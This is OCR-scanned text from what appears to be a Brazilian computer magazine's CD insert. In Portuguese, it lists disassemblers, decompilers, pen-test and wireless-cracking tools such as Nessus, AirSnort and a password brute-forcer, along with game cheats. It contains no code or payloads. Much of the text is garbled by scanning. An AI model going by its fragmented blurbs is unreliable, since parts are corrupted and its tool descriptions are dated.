de um arquivo class binário compilado 
DECAFE PRO 3.8 - Descorpia arqui- 
vos Java de extensão .class paralava,, 
podendo visualizar o código-fonte. 


Consegue decompilar até mesmo ap- 
plets complexas retornando um código 
próximo ao original 

BASTARD (LINUX) - Disassembler es- 
crito em linguagem C no Linux, decom- 
pila arquivos ELF na plataforma x86 
PERL X86 (LINUX) - Decompilador 
feito em Perl. Emprega as tabelas do 
opcode do libdisasm. Ele é derivado do 
projeto Bastard e é distribuído como 
parte do libdisasm 

LDASM (LINUX) - Disassembler com 
GUI em Perl/TK para objdump/binutils 
que tenta imitar o visual do W32Dasm. 
Ele necessita do Perl e do Perl/TK 


UNIVERSAL (LINUX) - O programa 
desmonta e lê diferentes tipos de 


arquivos binários. A funcionalidade é 
baseada em plug-ins para ler forma- 
tos como o ELF (Execute and Linking 
Format) do Unix 

BIEW - Editor avançado de binários, 
hexadecimais. Contém um disassembler, 
inspeção prévia de MZ, NE, PE, LE, LX, 
DOS.SYS, NLM, ELF, a.out, coff32 e 
alguns formatos executáveis do rdoff 
REAP (LINUX) - REAP(the Reverse 

"5 A; ent Eua ) 


Engine pau 


Ele «mm: É faz edição avançadas e 
inspeção se binários. 


aii para portabilidade e modularidade, 


Suporta uma escala de formatos de 
arquivos de objetos, incluindo Linux 
a.out e ELF, COFF, Microsoft OB) e 
Win32 16-bit 

PE EXPLORER - Disassembler e analisa- 

dor de códigos-fonte de binários chama- 

dos PE (portable executable), formato na- 
tivo de DLLs e EXES. Ele realiza algumas 
modificações nesses arquivos. Soporta gi 
EXE, DPL, BPL, DLL, DRV.eSYS Além 


ESSENCIAIS 


GTK+ 2.2.4 - Pacote necessário para rodar 


aplicações como o Gimp e o SodiPodi 
ACROBAT READER 6.0.1 - Visualize, 
navegue e imprima Adobe PDFs no seu 
browser. Este tipo de arquivo é muito 
comum em documentações gerais e 
agora você já pode vê-las por meio de 
seu browser 

FLASH PLAYER VZ.0 
(NETSCAPE,OPERA) - Última versão 
do plug-in para o principal formato de 
animação para Web 

FLASH PLAYER V7.0 (IE) 


VETO 


MONTAGEM E MANUTENÇÃO DE Pcs 


Como montar um PC gastando pouco 


jutadores 


so A a É = 
» Guia definitivo para manutenção de comp 


SA 


dos especialistas em harâware 


CT | Megti 


OE 


À C(DIGERATI 


especialista na comunidade digital 


Tigerati 


VPN SECURITY. FERRAMENTAS PARA SEGURANÇA EM CONEXÕES VPN 


“ Descubr as vantag ns e desvantagens de utilizar os a como 


“eles podem invadir a sua privac 


DISASSEMBLER 


Tudo para abrir e reconstruir arquivos binários 


IDA Pro 4.6 - Software usado para disassemblar 
o vírus Blaster. 

Hackman Disassembler 8.02 - Faz mudanças em 
arquivos executáveis. 

DJ Java Decompiler 3.5 - Decompilador Java 
que reconstró) o código original de um arquivo class 
binário compilado. 

DeCafe Pro 3.8 - Descompila arquivos Java de 
extensão .class para .java podendo visualizar 
o código fonte. Consegue decompilar até mes- 
mo applets complexas retornando um código 
próximo ao original. 

Bastard - Disassembler escrito em linguagem C no 
Linux, decompila arquivos ELF na plataforma x86. 
Perl x36 - Decompilador feito em Perl. Em- 
prega as tabelas do opcode do libdisasm. Ele 
é derivado do projeto Bastard. E é distribuído 
como parte do libdisasm. 

Ldasm - Disassembler com GUI em Perl/TK 
para objdump/binutils que tenta imitar o visual do 
W532Dasm.Ele necessita do Perl e do Perl/TK. 
Universal - O programa desmonta arquivos 


binários, lê diferentes tipos dec arquivos biná-* 


rios. A funcionalidade é baseada em plugins para 
ler formatos como o ELF (Execute and Linking 
Format) do Unix. 
Biew - Editor avançado de binários, hexadecimais. 
Contém um disassembler, inspeção prévia de MZ, 
NE, PE, LE, LX, DOS.SYS, NLM, ELF, a.out, coff32 
e alguns formatos executáveis do rdoff. 
reap - reap(the Reverse Engineer's Assembly 
Producer) com GUI feita em Perl/TK para ob- 
jdump binutil. 

: Sourcery - disassembler multiplataforma com 
interface feitaem GTK. 
NASM - Assembler desenvolvido para portabilida- 
de e modularidade que suporta escala de formatos 
de arquivos de objetos incluindo Linux a.out e ELF, 
Win32 16-bit e outros. 
PE Explorer - Disassembler e analizador de códigos 
fonte de binários chamados PE (portable executa- 
ble), formato nativo de DLLs e EXEs. 


PEN TESTS 


Use as ferramentas mais sofisticadas para detectar 
falhase vulnerabilidades na sua rede. 


Nessus 2.0 - Scanner remoto de segurança com 
uma extensa lista de plug-ins para analisar hosts 'e 
serviços oferecidos. 

Wellenreiter wireless penetrationtool - Ferramen- 
taparaauditoria de redes wireless 802.1b que suporta 
cards baseados em Prism2, Lucent e Cisco. 
Remote Access Session - Analisa a integri- 
dade de sistemas e usa técnicas avançadas de 
intrusão remota. 


« NmapWin 1.3.1 - Versão GUI do Nmap para Windows. 


nmap-sql - Característica adicional ao Nmap, 
que adiciona uma funcionabilidade de loggin 
MySQL diretamente. ao binário do Nmap. Isto 
pode ajudar muito em auditorias e pen tests 
com múltiplos scanners e subnets logging para 
uma database central. 

Leviathan Auditor - Ferramenta para audito- 
ria e pen test de redes, que roda em/e contra 
“máquinas Microsoft”. Trabalha com dumps de 
usuários, grupos, serviços, compartilhamentos, 
dispositivos de transporte e endereços MAC. 
RATS - Rough Auditing Tool for Security, é 
uma ferramenta para auditoria de códigos em 
€, C++, Python, Perle PHP. Ele efetua um scann 
no código, descobrindo function calls potencial- 
mente perigosas. 

FinalSolution - Programa que checa a força 
de passwords através de diversas tentativas 
no servidor em teste. O FinalSolution efetua 
múltiplas conexões numa tentativa de melhorar 
a banda de conexão durante o teste. 

Samba Audit - Pacote de módulos para auditoria 
de acesso ao (servidor de arquivos) Samba. 
The Gobbler - Aplicação para auditoria de 
redes DHCP, incluindo detecção de servidores 
DHCP rogue, DHCP DoS e muito mais. 
Kismet -- Detector de redes wireless 802.1 
layer2, sniffer, e detector de intrusão. 
AirSnort - Ferramenta wireless que re- 
cupera chaves de encriptações em redes 


WEP's 802.11b. 


“ROME 


The Packet Master Linux 
Security Server 


Imagem da distro que roda direto do CD e vem 
com um pacote de ferramentas para análise de 
vulnerabilidades, testes de penetração (perréests) 
e análises forenses. 


E) 


Vulnerabilidades expostas em servidores IIS, FTP 
Serv-U, MS SQL Server, Outlook, eMule; Squirrel: 
Mail e muito mais. — 


Ganhar roubando é ganhar sempre 

Fique em vantagem em Age Of Mythology: The 
Titans, Lord of the Rings: Fellowship of the Ring, 
Need For Speed: Underground, Battlefield tda, Call 
Of Dutty, Manhunt A 
Unreal Tournament 2004, Hitman: Contracisênos 
melhores jogos da atualidade. 


e 


O conteúdo do CD brinde é composto por programas. 
freeware, shareware e versões de demonstração 


Configuração mínima do equipamento: processador 
Pentium Il ou superior com 64 MB de RAM; placa de 
vídeo com 16 MB, resolução de 800x600 pixels e 16 | 
milhões de cores; placa de som. | 


Alguns programas, por motivos alheios à nossa 
vontade, podem não rodar no Windows XP. 


